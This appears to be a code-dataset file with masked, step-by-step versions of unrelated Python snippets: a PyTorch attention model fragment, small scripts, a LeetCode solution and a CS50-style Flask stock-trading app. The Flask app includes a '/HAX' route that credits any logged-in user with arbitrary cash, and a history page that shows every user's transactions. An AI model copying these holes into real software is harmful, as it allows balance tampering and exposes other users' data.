self.context_rnn_bidirectional else 1\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith(\"selector\"):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith(\"selector\"):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n ###topic model\n mean, logvar = self.encoder(x) # batchsize*50\n h = self.sampler(mean, logvar, cuda) # batchsize*50\n r = self.generator(h) # batchsize*50\n p_x_given_h = self.decoder(r) # batchsize*dv\n ###HAN\n num_utterance = len(input_list) # one batch doucument_list\n _, batch_size = input_list[0].size()\n # word-level rnn\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"word\")\n word_rnn_output_list = []\n word_attention_dict = {}\n # de_weight = torch.zeros(self.d_v, self.d_t).cuda()\n # de_weight.copy_(self.de.weight.data)\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(word_rnn_output)\n\n # word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)): # word_i word\n for clause_i in range(len(batch_data[word_i])): # clause_i data(batch)\n word_index = int(batch_data[word_i, clause_i]) # word index\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = 
(word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2\n else:\n word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]\n\n ##HAN\n word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n # context-level rnn\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level=\"context\")\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)\n context_attention_weight = self.context_conv_attention_linear(context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n\n return mean, logvar, p_x_given_h, logit, word_attention_dict",
"step-ids": [
5,
6,
8,
11,
12
]
}
|
[
5,
6,
8,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from external.odds.betclic.api import get_odds
<|reserved_special_token_1|>
from external.odds.betclic.api import get_odds
# FDJ parsing is broken - their UI has been refactored with JS framework &
# protected async JSON API usage (requires HEADERS) and more complex to isolate & group match odds
# hence move to another betting website - which is still full html rendered
|
flexible
|
{
"blob_id": "8b583ee55df409020a605b467479236e610a2efe",
"index": 3646,
"step-1": "<mask token>\n",
"step-2": "from external.odds.betclic.api import get_odds\n",
"step-3": "from external.odds.betclic.api import get_odds\n\n# FDJ parsing is broken - their UI has been refactored with JS framework &\n# protected async JSON API usage (requires HEADERS) and more complex to isolate & group match odds\n# hence move to another betting website - which is still full html rendered\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt'
) as f_obj:
lines = f_obj.readlines()
<|reserved_special_token_0|>
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt'
, 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt'
, 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt'
) as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt'
, 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt'
, 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
<|reserved_special_token_1|>
import datetime
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt'
) as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt'
, 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open(
'D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt'
, 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
<|reserved_special_token_1|>
import datetime
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming.txt') as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming1.txt', 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\guestbook.txt', 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
|
flexible
|
{
"blob_id": "03da813650d56e7ab92885b698d4af3a51176903",
"index": 3878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\n<mask token>\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-3": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-4": "import datetime\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-5": "import datetime\n\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt') as f_obj:\n lines = f_obj.readlines()\n\nm_lines = []\n\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt', 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt', 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
k = 0
for x in range(100, 1000, 2):
x = str(x)
if x[0] == x[1] or x[0] == x[2] or x[1] == x[2]:
k += 1
print(k)
|
normal
|
{
"blob_id": "af6dd7bde25453f25c0701e4ac246ff6bce29fa7",
"index": 1141,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor x in range(100, 1000, 2):\n x = str(x)\n if x[0] == x[1] or x[0] == x[2] or x[1] == x[2]:\n k += 1\nprint(k)\n",
"step-3": "k = 0\nfor x in range(100, 1000, 2):\n x = str(x)\n if x[0] == x[1] or x[0] == x[2] or x[1] == x[2]:\n k += 1\nprint(k)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def minNumberOfFrogs(self, croakOfFrogs: str) ->int:
c, r, o, a, k = 0, 0, 0, 0, 0
ans = 0
for i in range(len(croakOfFrogs)):
if croakOfFrogs[i] == 'c':
c += 1
if croakOfFrogs[i] == 'r':
r += 1
if croakOfFrogs[i] == 'o':
o += 1
if croakOfFrogs[i] == 'a':
a += 1
if croakOfFrogs[i] == 'k':
k += 1
ans = max(c - k, ans)
if c >= r and r >= o and o >= a and a >= k:
continue
else:
break
if c == r and r == o and o == a and a == k:
return ans
else:
return -1
<|reserved_special_token_1|>
# You are given a string croakOfFrogs, which represents a mix of croaking sounds (the string "croak") made by different frogs. Since several frogs may croak at the same time, croakOfFrogs can contain multiple interleaved "croak"s. Return the minimum number of different frogs needed to produce all of the croaks in the string.
# Note: to emit one croak "croak", a frog must output the 5 letters 'c', 'r', 'o', 'a', 'k' in order. If it does not output all five letters, it makes no sound.
# If the string croakOfFrogs is not a valid mix of several "croak"s, return -1.
# Source: LeetCode (力扣)
# Link: https://leetcode-cn.com/problems/minimum-number-of-frogs-croaking
# Copyright belongs to LeetCode; contact them for authorization before commercial reproduction, and cite the source for non-commercial reproduction.
class Solution:
def minNumberOfFrogs(self, croakOfFrogs: str) -> int:
        # 'c' must always come first and 'k' must always come last in each croak
c,r,o,a,k=0,0,0,0,0
ans=0
for i in range(len(croakOfFrogs)):
if croakOfFrogs[i]=="c":
c+=1
if croakOfFrogs[i]=="r":
r+=1
if croakOfFrogs[i]=="o":
o+=1
if croakOfFrogs[i]=="a":
a+=1
if croakOfFrogs[i]=="k":
k+=1
ans=max(c-k,ans)
if(c>=r and r>=o and o>=a and a>=k):
continue
else:
break
if (c==r and r==o and o==a and a==k):
return ans
else:
return -1
|
flexible
|
{
"blob_id": "b4491b5522e85fec64164b602045b9bd3e58c5b8",
"index": 4666,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def minNumberOfFrogs(self, croakOfFrogs: str) ->int:\n c, r, o, a, k = 0, 0, 0, 0, 0\n ans = 0\n for i in range(len(croakOfFrogs)):\n if croakOfFrogs[i] == 'c':\n c += 1\n if croakOfFrogs[i] == 'r':\n r += 1\n if croakOfFrogs[i] == 'o':\n o += 1\n if croakOfFrogs[i] == 'a':\n a += 1\n if croakOfFrogs[i] == 'k':\n k += 1\n ans = max(c - k, ans)\n if c >= r and r >= o and o >= a and a >= k:\n continue\n else:\n break\n if c == r and r == o and o == a and a == k:\n return ans\n else:\n return -1\n",
"step-4": "#给你一个字符串 croakOfFrogs,它表示不同青蛙发出的蛙鸣声(字符串 \"croak\" )的组合。由于同一时间可以有多只青蛙呱呱作响,所以 croakOfFrogs 中会混合多个 “croak” 。请你返回模拟字符串中所有蛙鸣所需不同青蛙的最少数目。\n\n#注意:要想发出蛙鸣 \"croak\",青蛙必须 依序 输出 ‘c’, ’r’, ’o’, ’a’, ’k’ 这 5 个字母。如果没有输出全部五个字母,那么它就不会发出声音。\n\n#如果字符串 croakOfFrogs 不是由若干有效的 \"croak\" 字符混合而成,请返回 -1 。\n\n#来源:力扣(LeetCode)\n#链接:https://leetcode-cn.com/problems/minimum-number-of-frogs-croaking\n#著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\nclass Solution:\n def minNumberOfFrogs(self, croakOfFrogs: str) -> int:\n #c一定在最前--k一定在最后\n c,r,o,a,k=0,0,0,0,0\n ans=0\n for i in range(len(croakOfFrogs)):\n if croakOfFrogs[i]==\"c\":\n c+=1\n if croakOfFrogs[i]==\"r\":\n r+=1\n if croakOfFrogs[i]==\"o\":\n o+=1\n if croakOfFrogs[i]==\"a\":\n a+=1\n if croakOfFrogs[i]==\"k\":\n k+=1\n ans=max(c-k,ans)\n if(c>=r and r>=o and o>=a and a>=k):\n continue\n else:\n break\n if (c==r and r==o and o==a and a==k):\n return ans\n else:\n return -1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
<|reserved_special_token_0|>
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
<|reserved_special_token_0|>
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
            return apology('must confirm password', 400)
        elif request.form.get('confirmation') != request.form.get('password'):
            return apology('passwords do not match', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.after_request
def after_request(response):
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_0|>
@app.route('/')
@login_required
def index():
"""Show portfolio of stocks"""
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])
cash_ = cash[0]['cash']
display = []
total_share = 0
for row in rows:
symbol = str(row['symbol'])
print(symbol)
name = lookup(symbol)['name']
shares = int(row['amount'])
price = float(lookup(symbol)['price'])
total = float(shares) * price
total_share += total
display.append({'symbol': symbol, 'name': name, 'shares': shares,
'price': price, 'total': total})
total_money = total_share + cash[0]['cash']
return render_template('index.html', display=display, total_money=
total_money, cash=cash_)
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
<|reserved_special_token_0|>
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 403)
elif not request.form.get('password'):
return apology('must provide password', 403)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 1 or not check_password_hash(rows[0]['hash'],
request.form.get('password')):
return apology('invalid username and/or password', 403)
session['user_id'] = rows[0]['id']
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
@app.route('/quote', methods=['GET', 'POST'])
@login_required
def quote():
"""Get stock quote."""
if request.method == 'POST':
quote = lookup(request.form.get('symbol'))
if quote == None:
return apology('Invalid symbol', 400)
price = usd(quote['price'])
return render_template('quoted.html', quote=quote, price=price)
else:
return render_template('quote.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
            return apology('must confirm password', 400)
        elif request.form.get('confirmation') != request.form.get('password'):
            return apology('passwords do not match', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
<|reserved_special_token_0|>
@app.route('/HAX', methods=['GET', 'POST'])
@login_required
def HAX():
if request.method == 'POST':
total = request.form.get('HAX')
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect('/')
else:
return render_template('HAX.html')
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
@app.after_request
def after_request(response):
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
app.jinja_env.filters['usd'] = usd
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
db = SQL('sqlite:///finance.db')
if not os.environ.get('API_KEY'):
raise RuntimeError('API_KEY not set')
@app.route('/')
@login_required
def index():
"""Show portfolio of stocks"""
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])
cash_ = cash[0]['cash']
display = []
total_share = 0
for row in rows:
symbol = str(row['symbol'])
print(symbol)
name = lookup(symbol)['name']
shares = int(row['amount'])
price = float(lookup(symbol)['price'])
total = float(shares) * price
total_share += total
display.append({'symbol': symbol, 'name': name, 'shares': shares,
'price': price, 'total': total})
total_money = total_share + cash[0]['cash']
return render_template('index.html', display=display, total_money=
total_money, cash=cash_)
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
@app.route('/history')
@login_required
def history():
"""Show history of transactions"""
rows = db.execute('SELECT * FROM record ORDER BY t1')
return render_template('history.html', rows=rows)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 403)
elif not request.form.get('password'):
return apology('must provide password', 403)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 1 or not check_password_hash(rows[0]['hash'],
request.form.get('password')):
return apology('invalid username and/or password', 403)
session['user_id'] = rows[0]['id']
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
@app.route('/quote', methods=['GET', 'POST'])
@login_required
def quote():
"""Get stock quote."""
if request.method == 'POST':
quote = lookup(request.form.get('symbol'))
if quote == None:
return apology('Invalid symbol', 400)
price = usd(quote['price'])
return render_template('quoted.html', quote=quote, price=price)
else:
return render_template('quote.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
            return apology('must confirm password', 400)
        elif request.form.get('confirmation') != request.form.get('password'):
            return apology('passwords do not match', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
@app.route('/sell', methods=['GET', 'POST'])
@login_required
def sell():
"""Sell shares of stock"""
if request.method == 'POST':
if not request.form.get('shares'):
            return apology('Please enter how many shares you want to sell', 400)
sell = request.form.get('symbol')
shares = request.form.get('shares')
amount = db.execute(
'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'
, session['user_id'], sell)
if amount[0]['amount'] < int(shares):
            return apology('You do not own that many shares', 400)
quote = lookup(sell)
price = quote['price']
total = int(price) * int(shares)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))"
, session['user_id'], int(shares) * -1, quote['symbol'], price)
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
return render_template('sell.html', rows=rows)
@app.route('/HAX', methods=['GET', 'POST'])
@login_required
def HAX():
if request.method == 'POST':
total = request.form.get('HAX')
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect('/')
else:
return render_template('HAX.html')
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
<|reserved_special_token_1|>
import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
@app.after_request
def after_request(response):
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
app.jinja_env.filters['usd'] = usd
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
db = SQL('sqlite:///finance.db')
if not os.environ.get('API_KEY'):
raise RuntimeError('API_KEY not set')
@app.route('/')
@login_required
def index():
"""Show portfolio of stocks"""
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])
cash_ = cash[0]['cash']
display = []
total_share = 0
for row in rows:
symbol = str(row['symbol'])
print(symbol)
name = lookup(symbol)['name']
shares = int(row['amount'])
price = float(lookup(symbol)['price'])
total = float(shares) * price
total_share += total
display.append({'symbol': symbol, 'name': name, 'shares': shares,
'price': price, 'total': total})
total_money = total_share + cash[0]['cash']
return render_template('index.html', display=display, total_money=
total_money, cash=cash_)
@app.route('/buy', methods=['GET', 'POST'])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == 'POST':
if not request.form.get('symbol'):
return apology('must provide symbol', 400)
elif not request.form.get('shares'):
return apology('must provide shares', 400)
if not request.form.get('shares').isdigit():
return apology('must be integer', 400)
elif int(request.form.get('shares')) < 1:
return apology('must be positive integer', 400)
elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
@app.route('/history')
@login_required
def history():
"""Show history of transactions"""
rows = db.execute('SELECT * FROM record ORDER BY t1')
return render_template('history.html', rows=rows)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 403)
elif not request.form.get('password'):
return apology('must provide password', 403)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 1 or not check_password_hash(rows[0]['hash'],
request.form.get('password')):
return apology('invalid username and/or password', 403)
session['user_id'] = rows[0]['id']
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
@app.route('/quote', methods=['GET', 'POST'])
@login_required
def quote():
"""Get stock quote."""
if request.method == 'POST':
quote = lookup(request.form.get('symbol'))
if quote == None:
return apology('Invalid symbol', 400)
price = usd(quote['price'])
return render_template('quoted.html', quote=quote, price=price)
else:
return render_template('quote.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
            return apology('must confirm password', 400)
        elif request.form.get('confirmation') != request.form.get('password'):
            return apology('passwords do not match', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
